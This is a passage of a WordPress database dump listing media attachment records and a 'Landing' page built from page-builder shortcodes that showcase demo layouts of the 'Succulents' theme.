09:54:34','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h9-img-12.jpg',0,'attachment','image/jpeg',0),(3368,1,'2018-02-23 13:08:27','2018-02-23 13:08:27','','blog-quote-post-img-1','','inherit','open','closed','','blog-quote-post-img-1','','','2018-02-23 13:08:27','2018-02-23 13:08:27','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/blog-quote-post-img-1.jpg',0,'attachment','image/jpeg',0),(3369,1,'2018-02-23 13:08:57','2018-02-23 13:08:57','','blog-link-post-img-1','','inherit','open','closed','','blog-link-post-img-1','','','2018-02-23 13:08:57','2018-02-23 13:08:57','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/blog-link-post-img-1.jpg',0,'attachment','image/jpeg',0),(3376,1,'2018-02-23 13:32:15','2018-02-23 13:32:15','','h4-img-3','','inherit','open','closed','','h4-img-3-2','','','2018-02-23 13:32:15','2018-02-23 13:32:15','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h4-img-3.jpg',0,'attachment','image/jpeg',0),(3377,1,'2018-02-23 14:01:17','2018-02-23 14:01:17','','h9-img-17','','inherit','open','closed','','h9-img-17','','','2018-02-23 14:01:17','2018-02-23 14:01:17','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h9-img-17.jpg',0,'attachment','image/jpeg',0),(3382,1,'2018-02-23 14:39:59','2018-02-23 14:39:59','[vc_row][vc_column][rev_slider_vc alias=\"landing\" enable_paspartu=\"no\"][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" css=\".vc_custom_1519815581147{padding-top: 0px !important;padding-bottom: 0px !important;}\" simple_background_color=\"#fed3c3\"][vc_column][qodef_animation_holder animation=\"qodef-element-from-fade\" animation_delay=\"200\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"36px 7px 0 86px\" item_padding_680_768=\"36px 67px 0 67px\" item_padding_680=\"36px 39px 0 39px\"][qodef_image_with_text enable_image_shadow=\"no\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" title_tag=\"h4\" image=\"4232\" image_size=\"full\" custom_link=\"http://succulents.select-themes.com/\" title=\"Main Home\" title_color=\"#ffffff\"][vc_empty_space height=\"40px\"][/qodef_elements_holder_item][qodef_elements_holder_item item_padding=\"36px 46px 0 46px\" item_padding_680_768=\" 0px 67px 0px 67px\" item_padding_680=\"0px 39px 0 39px\"][qodef_image_with_text enable_image_shadow=\"no\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" title_tag=\"h4\" image=\"4233\" image_size=\"full\" custom_link=\"http://succulents.select-themes.com/vegan-home\" title=\"Vegan Home\" title_color=\"#ffffff\"][vc_empty_space height=\"40px\"][/qodef_elements_holder_item][qodef_elements_holder_item item_padding=\"36px 88px 0 6px\" item_padding_680_768=\" 0px 67px 0px 67px\" item_padding_680=\"0px 39px 0 39px\"][qodef_image_with_text enable_image_shadow=\"no\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" title_tag=\"h4\" image=\"4235\" image_size=\"full\" custom_link=\"http://succulents.select-themes.com/skincare-home\" title=\"Skincare Home\" title_color=\"#ffffff\"][vc_empty_space height=\"40px\"][/qodef_elements_holder_item][/qodef_elements_holder][/qodef_animation_holder][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" css=\".vc_custom_1519815363184{padding-top: 0px !important;padding-bottom: 0px !important;}\" simple_background_color=\"#fed3c3\"][vc_column][qodef_animation_holder animation=\"qodef-element-from-fade\" animation_delay=\"200\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0 7px 0 86px\" item_padding_680_768=\"0px 67px 0 67px\" item_padding_680=\"0px 39px 0 39px\"][qodef_image_with_text enable_image_shadow=\"no\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" title_tag=\"h4\" image_size=\"full\" custom_link=\"http://succulents.select-themes.com/wellness-home\" title=\"Wellness Home\" image=\"4243\" title_color=\"#ffffff\"][vc_empty_space height=\"40px\"][/qodef_elements_holder_item][qodef_elements_holder_item item_padding=\"0 46px 0 46px\" item_padding_680_768=\" 0px 67px 0px 67px\"][qodef_image_with_text enable_image_shadow=\"no\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" title_tag=\"h4\" image=\"4237\" image_size=\"full\" custom_link=\"http://succulents.select-themes.com/fitness-home\" title=\"Fitness Home\" title_color=\"#ffffff\"][vc_empty_space height=\"40px\"][/qodef_elements_holder_item][qodef_elements_holder_item item_padding=\"0 88px 0 6px\" item_padding_680_768=\" 0px 67px 0px 67px\" item_padding_680=\"0px 39px 0 39px\"][qodef_image_with_text enable_image_shadow=\"no\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" title_tag=\"h4\" image=\"3973\" image_size=\"full\" custom_link=\"http://succulents.select-themes.com/recipes-home\" title=\"Recipes Home\" title_color=\"#ffffff\"][vc_empty_space height=\"40px\"][/qodef_elements_holder_item][/qodef_elements_holder][/qodef_animation_holder][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" css=\".vc_custom_1519815353159{padding-top: 0px !important;padding-bottom: 0px !important;}\" simple_background_color=\"#fed3c3\"][vc_column][qodef_animation_holder animation=\"qodef-element-from-fade\" animation_delay=\"200\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0 7px 0 86px\" item_padding_680_768=\"0px 67px 0 67px\" item_padding_680=\"0px 39px 0 39px\"][qodef_image_with_text enable_image_shadow=\"no\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" title_tag=\"h4\" image=\"4239\" image_size=\"full\" custom_link=\"http://succulents.select-themes.com/portfolio-pinterest\" title=\"Portfolio Pinterest\" title_color=\"#ffffff\"][vc_empty_space height=\"40px\"][/qodef_elements_holder_item][qodef_elements_holder_item item_padding=\"0 46px 0 46px\" item_padding_680_768=\" 0px 67px 0px 67px\" item_padding_680=\"0px 39px 0 39p\"][qodef_image_with_text enable_image_shadow=\"no\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" title_tag=\"h4\" image=\"3969\" image_size=\"full\" custom_link=\"http://succulents.select-themes.com/yoga-home\" title=\"Yoga Home\" title_color=\"#ffffff\"][vc_empty_space height=\"40px\"][/qodef_elements_holder_item][qodef_elements_holder_item item_padding=\"0 88px 0 6px\" item_padding_680_768=\" 0px 67px 0px 67px\" item_padding_680=\"0px 39px 0 39px\"][qodef_image_with_text enable_image_shadow=\"no\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" title_tag=\"h4\" image=\"4245\" image_size=\"full\" custom_link=\"http://succulents.select-themes.com/split-screen-showcase\" title=\"Split Screen Showcase\" title_color=\"#ffffff\"][vc_empty_space height=\"40px\"][/qodef_elements_holder_item][/qodef_elements_holder][/qodef_animation_holder][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" css=\".vc_custom_1519815319469{padding-top: 0px !important;padding-bottom: 170px !important;}\" simple_background_color=\"#fed3c3\"][vc_column][qodef_animation_holder animation=\"qodef-element-from-fade\" animation_delay=\"200\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0 7px 0 86px\" item_padding_680_768=\"0px 67px 0 67px\" item_padding_680=\"0px 39px 38px 39px\"][qodef_image_with_text enable_image_shadow=\"no\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" title_tag=\"h4\" image=\"4241\" image_size=\"full\" custom_link=\"http://succulents.select-themes.com/full-screen-showcase\" title=\"Full Screen Showcase\" title_color=\"#ffffff\"][vc_empty_space height=\"4px\"][/qodef_elements_holder_item][qodef_elements_holder_item item_padding=\"0 46px 0 46px\" item_padding_680_768=\"36px 67px 0px 67px\" item_padding_680=\"0px 39px 38px 39px\"][qodef_image_with_text enable_image_shadow=\"no\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" title_tag=\"h4\" image=\"4247\" image_size=\"full\" custom_link=\"http://succulents.select-themes.com/coming-soon\" title=\"Coming Soon\" title_color=\"#ffffff\"][vc_empty_space height=\"4px\"][/qodef_elements_holder_item][qodef_elements_holder_item item_padding=\"0 88px 0 6px\" item_padding_680_768=\" 0px 67px 0px 67px\" item_padding_680=\"30px 38px 0 0px\"][qodef_image_with_text enable_image_shadow=\"no\" image=\"4211\" image_size=\"full\"][vc_empty_space height=\"4px\"][/qodef_elements_holder_item][/qodef_elements_holder][/qodef_animation_holder][/vc_column][/vc_row][vc_row simple_background_color=\"#f7f7f7\"][vc_column][rev_slider alias=\"slidercimet\"][/vc_column][/vc_row][vc_row disable_background_image=\"\" content_text_aligment=\"center\" simple_background_image=\"3586\" css=\".vc_custom_1519725639819{padding-top: 148px !important;padding-bottom: 116px !important;}\"][vc_column][qodef_section_title type=\"standard\" position=\"center\" subtitle_tag=\"h6\" title_tag=\"h1\" disable_break_words=\"no\" subtitle=\"PRACTICAL & PREDESIGNED\" title=\"Inner Pages\" subtitle_color=\"#ffffff\" title_color=\"#ffffff\"][vc_empty_space height=\"81px\"][qodef_image_gallery type=\"carousel\" enable_image_shadow=\"no\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" space_between_items=\"normal\" number_of_visible_items=\"2\" slider_loop=\"yes\" slider_autoplay=\"yes\" slider_auto_width=\"yes\" enable-center=\"yes\" slider_navigation=\"no\" slider_pagination=\"yes\" slider_pagination_skin=\"qodef-light-skin\" image_size=\"full\" images=\"4178,4180,4181,4188,4189\" custom_links=\"http://succulents.select-themes.com/about-us/, http://succulents.select-themes.com/contact-us/, http://succulents.select-themes.com/our-team/, http://succulents.select-themes.com/pricing-plans/, http://succulents.select-themes.com/what-we-offer/\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1519725875118{background-color: #f7f7f7 !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1519725968851{margin-top: -162px !important;}\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item animation=\"qodef-grow-in\" item_padding=\"0px 0px 0px 46%\" item_padding_768_1024=\"0px 0px 0px 0px\" item_padding_680_768=\"63px 47% 0px 4%\" animation_delay=\"200\" item_padding_680=\"45px 57% 0px 0%\"][qodef_single_image enable_image_shadow=\"no\" image=\"3583\" image_size=\"full\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1519726211533{margin-top: -95px !important;}\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item animation=\"qodef-grow-in\" item_padding=\"0px 0px 0px 33%\" item_padding_680_768=\"28px 36% 0px 33%\" animation_delay=\"200\" item_padding_680=\"0px 24% 0px 53% \"][qodef_single_image enable_image_shadow=\"no\" image=\"3584\" image_size=\"full\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" disable_background_image=\"1280\" css=\".vc_custom_1520586912867{padding-top: 24px !important;padding-bottom: 60px !important;}\" simple_background_color=\"#f7f7f7\" simple_background_image=\"4076\"][vc_column width=\"5/6\" css=\".vc_custom_1520604667316{padding-right: 11% !important;}\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-0 vc_col-md-10 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item animation=\"qodef-element-from-left\" animation_delay=\"200\" item_padding=\"117px 0px 0px 0%\" item_padding_1280_1600=\"122px 0px 0px 0px\" item_padding_768_1024=\"12px 0px 93px 0px\" item_padding_680_768=\"6px 0px 92px 0px\" item_padding_680=\"28px 0px 60px 0px\" item_padding_1024_1280=\"117px 0px 0px 0px\"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"h6\" title_tag=\"h1\" disable_break_words=\"no\" subtitle=\"BUNDLED FOR FREE\" title=\"Timetable\"][vc_empty_space height=\"18px\"][qodef_single_image enable_image_shadow=\"no\" image=\"130\"][vc_column_text]Succulents comes with the premium Timetable Responsive Schedule For WordPress plugin for free, which lets you create beautiful timetables for your events with ease.[/vc_column_text][vc_empty_space height=\"40px\"][qodef_single_image enable_image_shadow=\"no\" image=\"3536\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][vc_column css=\".vc_custom_1519729564164{margin-top: -50px !important;}\" offset=\"vc_col-lg-offset-0 vc_col-lg-8 vc_col-md-offset-0 vc_col-md-12 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item animation=\"qodef-element-from-right\" item_padding=\"66px 0px 52px 0px\" animation_delay=\"200\" item_padding_768_1024=\"0px 0px 65px 0px\" item_padding_680_768=\"0px 0px 70px 0px \" item_padding_1280_1600=\"90px 0px 80px 2%\" item_padding_680=\"30px 0px 63px 0px\" item_padding_1024_1280=\"66px 0px 54px 0px\"][qodef_single_image enable_image_shadow=\"no\" image=\"3531\" image_size=\"full\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row][vc_column][rev_slider alias=\"landingbrown\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" simple_background_color=\"#ffffff\"][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-6 vc_col-md-offset-0 vc_col-md-12 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item animation=\"qodef-element-from-left\" item_padding=\"163px 49px 160px 0px\" animation_delay=\"200\" item_padding_768_1024=\"146px 49px 0px 0px\" item_padding_680=\"120px 0px 0px 0px\" item_padding_1280_1600=\"140px 0px 109px 0px\" item_padding_1024_1280=\"150px 49px 110px 0px\"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"h6\" title_tag=\"h1\" disable_break_words=\"no\" subtitle=\"REMARKABLE SET OF\" title=\"Portfolio Layouts\"][vc_empty_space height=\"18px\"][qodef_single_image enable_image_shadow=\"no\" image=\"130\"][vc_column_text]Showcasing your delicious meals and dishes or just about any other aspect of your business in an absolutely stunning way has never been this easy. Succulents is packed full with a captivating set of portfolio lists, sliders & single project layouts which are sure to get you noticed.[/vc_column_text][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-6 vc_col-md-offset-0 vc_col-md-12 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item animation=\"qodef-element-from-right\" item_padding=\"119px 0px 0px 0px\" animation_delay=\"200\" item_padding_768_1024=\"68px 102px 148px 0px\" item_padding_680=\"68px 29px 120px 0px\" item_padding_1280_1600=\"120px 0px 109px 0px\" item_padding_680_768=\"0px 0px 160px 0px\"][qodef_single_image enable_image_shadow=\"no\" image=\"4250\" image_size=\"full\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row el_class=\"qodef-uncovering-section\"][vc_column][rev_slider alias=\"landingfooter\"][/vc_column][/vc_row]','Landing','','publish','closed','closed','','landing','','','2018-02-23 14:39:59','2018-02-23 14:39:59','',0,'http://succulents.select-themes.com/?page_id=3382',0,'page','',0),(3396,1,'2018-02-23 15:24:29','2018-02-23 15:24:29','','landing-slide1-graphic1','','inherit','open','closed','','landing-slide1-graphic1','','','2018-02-23 15:24:29','2018-02-23 15:24:29','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-slide1-graphic1-1.png',0,'attachment','image/png',0),(3397,1,'2018-02-23 15:24:32','2018-02-23 15:24:32','','landing-slide1-graphic2','','inherit','open','closed','','landing-slide1-graphic2','','','2018-02-23 15:24:32','2018-02-23 15:24:32','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-slide1-graphic2.png',0,'attachment','image/png',0),(3398,1,'2018-02-23 15:24:34','2018-02-23 15:24:34','','landing-slide1-graphic3','','inherit','open','closed','','landing-slide1-graphic3','','','2018-02-23 15:24:34','2018-02-23 15:24:34','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-slide1-graphic3.png',0,'attachment','image/png',0),(3399,1,'2018-02-23 15:24:36','2018-02-23 15:24:36','','landing-slide1-graphic4','','inherit','open','closed','','landing-slide1-graphic4','','','2018-02-23 15:24:36','2018-02-23 15:24:36','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-slide1-graphic4.png',0,'attachment','image/png',0),(3400,1,'2018-02-23 15:24:37','2018-02-23 15:24:37','','landing-slide1-graphic5','','inherit','open','closed','','landing-slide1-graphic5','','','2018-02-23 15:24:37','2018-02-23 15:24:37','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-slide1-graphic5.png',0,'attachment','image/png',0),(3401,1,'2018-02-23 15:24:39','2018-02-23 15:24:39','','landing-slide1-graphic6','','inherit','open','closed','','landing-slide1-graphic6','','','2018-02-23 15:24:39','2018-02-23 15:24:39','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-slide1-graphic6.png',0,'attachment','image/png',0),(3402,1,'2018-02-23 15:24:42','2018-02-23 15:24:42','','landing-slide1-graphic7','','inherit','open','closed','','landing-slide1-graphic7','','','2018-02-23 15:24:42','2018-02-23 15:24:42','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-slide1-graphic7.png',0,'attachment','image/png',0),(3403,1,'2020-04-12 11:50:58','2020-04-12 11:50:58','','Logo-fotnote-800','','inherit','open','closed','','logo-fotnote-800','','','2020-04-12 11:51:05','2020-04-12 11:51:05','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-fotnote-800.png',0,'attachment','image/png',0),(3405,1,'2018-02-23 15:39:19','2018-02-23 15:39:19','','landing-background','','inherit','open','closed','','landing-background','','','2018-02-23 15:39:19','2018-02-23 15:39:19','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-background.jpg',0,'attachment','image/jpeg',0),(3406,1,'2018-02-23 15:45:12','2018-02-23 15:45:12','','h4-img-12','','inherit','open','closed','','h4-img-12','','','2018-02-23 15:45:12','2018-02-23 15:45:12','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h4-img-12.jpg',0,'attachment','image/jpeg',0),(3412,1,'2018-02-26 06:59:45','2018-02-26 06:59:45','','h1-iwt-img-3','','inherit','open','closed','','h1-iwt-img-3','','','2018-02-26 06:59:45','2018-02-26 06:59:45','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h1-iwt-img-3.png',0,'attachment','image/png',0),(3414,1,'2018-02-26 07:07:33','2018-02-26 07:07:33','','h1-iwt-img-1','','inherit','open','closed','','h1-iwt-img-1','','','2018-02-26 07:07:33','2018-02-26 07:07:33','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h1-iwt-img-1.png',0,'attachment','image/png',0),(3415,1,'2018-02-26 07:07:57','2018-02-26 07:07:57','','h1-iwt-img-2','','inherit','open','closed','','h1-iwt-img-2','','','2018-02-26 07:07:57','2018-02-26 07:07:57','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h1-iwt-img-2.png',0,'attachment','image/png',0),(3446,1,'2018-02-26 10:35:33','2018-02-26 10:35:33','','landing-footer-img1','','inherit','open','closed','','landing-footer-img1','','','2018-02-26 10:35:33','2018-02-26 10:35:33','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-footer-img1.png',0,'attachment','image/png',0),(3447,1,'2018-02-26 10:35:35','2018-02-26 10:35:35','','landing-footer-img2','','inherit','open','closed','','landing-footer-img2','','','2018-02-26 10:35:35','2018-02-26 10:35:35','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-footer-img2.png',0,'attachment','image/png',0),(3448,1,'2018-02-26 10:35:37','2018-02-26 10:35:37','','landing-slide2-graphic3','','inherit','open','closed','','landing-slide2-graphic3','','','2018-02-26 10:35:37','2018-02-26 10:35:37','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-slide2-graphic3.png',0,'attachment','image/png',0),(3449,1,'2018-02-26 10:35:39','2018-02-26 10:35:39','','landing-slide2-graphic4','','inherit','open','closed','','landing-slide2-graphic4','','','2018-02-26 10:35:39','2018-02-26 10:35:39','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-slide2-graphic4.png',0,'attachment','image/png',0),(3451,1,'2018-02-26 10:35:41','2018-02-26 10:35:41','','landing-slide2-graphic5','','inherit','open','closed','','landing-slide2-graphic5','','','2018-02-26 10:35:41','2018-02-26 10:35:41','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-slide2-graphic5.png',0,'attachment','image/png',0),(3452,1,'2018-02-26 10:35:42','2018-02-26 10:35:42','','landing-slide2-graphic6','','inherit','open','closed','','landing-slide2-graphic6','','','2018-02-26 10:35:42','2018-02-26 10:35:42','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-slide2-graphic6.png',0,'attachment','image/png',0),(3453,1,'2018-02-26 10:35:44','2018-02-26 10:35:44','','landing-slide2-graphic7','','inherit','open','closed','','landing-slide2-graphic7','','','2018-02-26 10:35:44','2018-02-26 10:35:44','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-slide2-graphic7.png',0,'attachment','image/png',0),(3454,1,'2018-02-26 10:35:46','2018-02-26 10:35:46','','landing-slide2-graphic8','','inherit','open','closed','','landing-slide2-graphic8','','','2018-02-26 10:35:46','2018-02-26 10:35:46','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-slide2-graphic8.png',0,'attachment','image/png',0),(3505,1,'2018-02-26 13:13:59','2018-02-26 13:13:59','','landing-slide4-graphic2','','inherit','open','closed','','landing-slide4-graphic2','','','2018-02-26 13:13:59','2018-02-26 13:13:59','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-slide4-graphic2.png',0,'attachment','image/png',0),(3509,1,'2018-02-26 13:25:45','2018-02-26 13:25:45','','landing-slide4-graphic1','','inherit','open','closed','','landing-slide4-graphic1','','','2018-02-26 13:25:45','2018-02-26 13:25:45','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-slide4-graphic1.png',0,'attachment','image/png',0),(3510,1,'2018-02-26 13:27:40','2018-02-26 13:27:40','','landing-brown-3','','inherit','open','closed','','landing-brown-3','','','2018-02-26 13:27:40','2018-02-26 13:27:40','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-brown-3.png',0,'attachment','image/png',0),(3511,1,'2018-02-26 13:29:19','2018-02-26 13:29:19','','landing-brown-2','','inherit','open','closed','','landing-brown-2','','','2018-02-26 13:29:19','2018-02-26 13:29:19','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-brown-2.jpg',0,'attachment','image/jpeg',0),(3512,1,'2018-02-26 13:30:51','2018-02-26 13:30:51','','landing-brown','','inherit','open','closed','','landing-brown','','','2018-02-26 13:30:51','2018-02-26 13:30:51','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-brown.jpg',0,'attachment','image/jpeg',0),(3513,1,'2018-02-26 13:39:02','2018-02-26 13:39:02','','landing-about-us','','inherit','open','closed','','landing-about-us','','','2018-02-26 13:39:02','2018-02-26 13:39:02','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-about-us.jpg',0,'attachment','image/jpeg',0),(3514,1,'2018-02-26 13:39:04','2018-02-26 13:39:04','','landing-contact-us','','inherit','open','closed','','landing-contact-us','','','2018-02-26 13:39:04','2018-02-26 13:39:04','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-contact-us.jpg',0,'attachment','image/jpeg',0),(3515,1,'2018-02-26 13:39:07','2018-02-26 13:39:07','','landing-our-team','','inherit','open','closed','','landing-our-team','','','2018-02-26 13:39:07','2018-02-26 13:39:07','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-our-team.jpg',0,'attachment','image/jpeg',0),(3516,1,'2018-02-26 13:39:09','2018-02-26 13:39:09','','landing-pricing-packages','','inherit','open','closed','','landing-pricing-packages','','','2018-02-26 13:39:09','2018-02-26 13:39:09','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-pricing-packages.jpg',0,'attachment','image/jpeg',0),(3526,1,'2018-02-26 14:00:33','2018-02-26 14:00:33','','landing-coming-soon','','inherit','open','closed','','landing-coming-soon','','','2018-02-26 14:00:33','2018-02-26 14:00:33','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-coming-soon.jpg',0,'attachment','image/jpeg',0),(3531,1,'2018-02-26 14:25:24','2018-02-26 14:25:24','','animation-holder-1','','inherit','open','closed','','animation-holder-1','','','2018-02-26 14:25:24','2018-02-26 14:25:24','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/animation-holder-1.jpg',0,'attachment','image/jpeg',0),(3536,1,'2018-02-26 14:30:21','2018-02-26 14:30:21','','animation-holder-2','','inherit','open','closed','','animation-holder-2','','','2018-02-26 14:30:21','2018-02-26 14:30:21','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/animation-holder-2.png',0,'attachment','image/png',0),(3546,1,'2018-02-26 14:48:02','2018-02-26 14:48:02','','landing-cimet-img-7','','inherit','open','closed','','landing-cimet-img-7','','','2018-02-26 14:48:02','2018-02-26 14:48:02','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-cimet-img-7.png',0,'attachment','image/png',0),(3551,1,'2018-02-26 14:59:47','2018-02-26 14:59:47','','animation-holder-3','','inherit','open','closed','','animation-holder-3','','','2018-02-26 14:59:47','2018-02-26 14:59:47','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/animation-holder-3.png',0,'attachment','image/png',0),(3556,1,'2018-02-26 15:03:32','2018-02-26 15:03:32','','landing-cimet-img-4 (2)','','inherit','open','closed','','landing-cimet-img-4-2','','','2018-02-26 15:03:32','2018-02-26 15:03:32','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-cimet-img-4-2.png',0,'attachment','image/png',0),(3562,1,'2018-02-26 15:09:44','2018-02-26 15:09:44','','landing-slide2-graphic1','','inherit','open','closed','','landing-slide2-graphic1','','','2018-02-26 15:09:44','2018-02-26 15:09:44','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-slide2-graphic1.png',0,'attachment','image/png',0),(3565,1,'2018-02-26 15:11:07','2018-02-26 15:11:07','','landing-cimet-img-2','','inherit','open','closed','','landing-cimet-img-2','','','2018-02-26 15:11:07','2018-02-26 15:11:07','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-cimet-img-2.png',0,'attachment','image/png',0),(3566,1,'2018-02-26 15:13:35','2018-02-26 15:13:35','','landing-slide2-graphic2','','inherit','open','closed','','landing-slide2-graphic2','','','2018-02-26 15:13:35','2018-02-26 15:13:35','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-slide2-graphic2.png',0,'attachment','image/png',0),(3570,1,'2018-02-26 15:42:23','2018-02-26 15:42:23','','landing-background-leaves-1','','inherit','open','closed','','landing-background-leaves-1','','','2018-02-26 15:42:23','2018-02-26 15:42:23','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-background-leaves-1.jpg',0,'attachment','image/jpeg',0),(3583,1,'2018-02-27 09:32:41','2018-02-27 09:32:41','','leaf-img-1','','inherit','open','closed','','leaf-img-1','','','2018-02-27 09:32:41','2018-02-27 09:32:41','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/leaf-img-1.png',0,'attachment','image/png',0),(3584,1,'2018-02-27 09:58:55','2018-02-27 09:58:55','','leaf-img-2','','inherit','open','closed','','leaf-img-2','','','2018-02-27 09:58:55','2018-02-27 09:58:55','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/leaf-img-2.png',0,'attachment','image/png',0),(3586,1,'2018-02-27 09:59:31','2018-02-27 09:59:31','','landing-background-leaves-3','','inherit','open','closed','','landing-background-leaves-3','','','2018-02-27 09:59:31','2018-02-27 09:59:31','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-background-leaves-3.jpg',0,'attachment','image/jpeg',0),(3626,1,'2018-02-27 13:09:23','2018-02-27 13:09:23','','landing-gradient-1','','inherit','open','closed','','landing-gradient-1','','','2018-02-27 13:09:23','2018-02-27 13:09:23','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-gradient-1.jpg',0,'attachment','image/jpeg',0),(3715,1,'2018-02-28 14:58:40','2018-02-28 14:58:40','','h3-slide2-graphicP','','inherit','open','closed','','h3-slide2-graphicp','','','2018-02-28 14:58:40','2018-02-28 14:58:40','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide2-graphicP.png',0,'attachment','image/png',0),(3728,1,'2018-03-01 10:23:03','2018-03-01 10:23:03','','recept-1','','inherit','open','closed','','recept-1','','','2018-03-01 10:23:03','2018-03-01 10:23:03','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/recept-1.png',0,'attachment','image/png',0),(3730,1,'2018-03-01 10:24:29','2018-03-01 10:24:29','','recept-2','','inherit','open','closed','','recept-2','','','2018-03-01 10:24:29','2018-03-01 10:24:29','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/recept-2.png',0,'attachment','image/png',0),(3732,1,'2018-03-01 14:49:19','2018-03-01 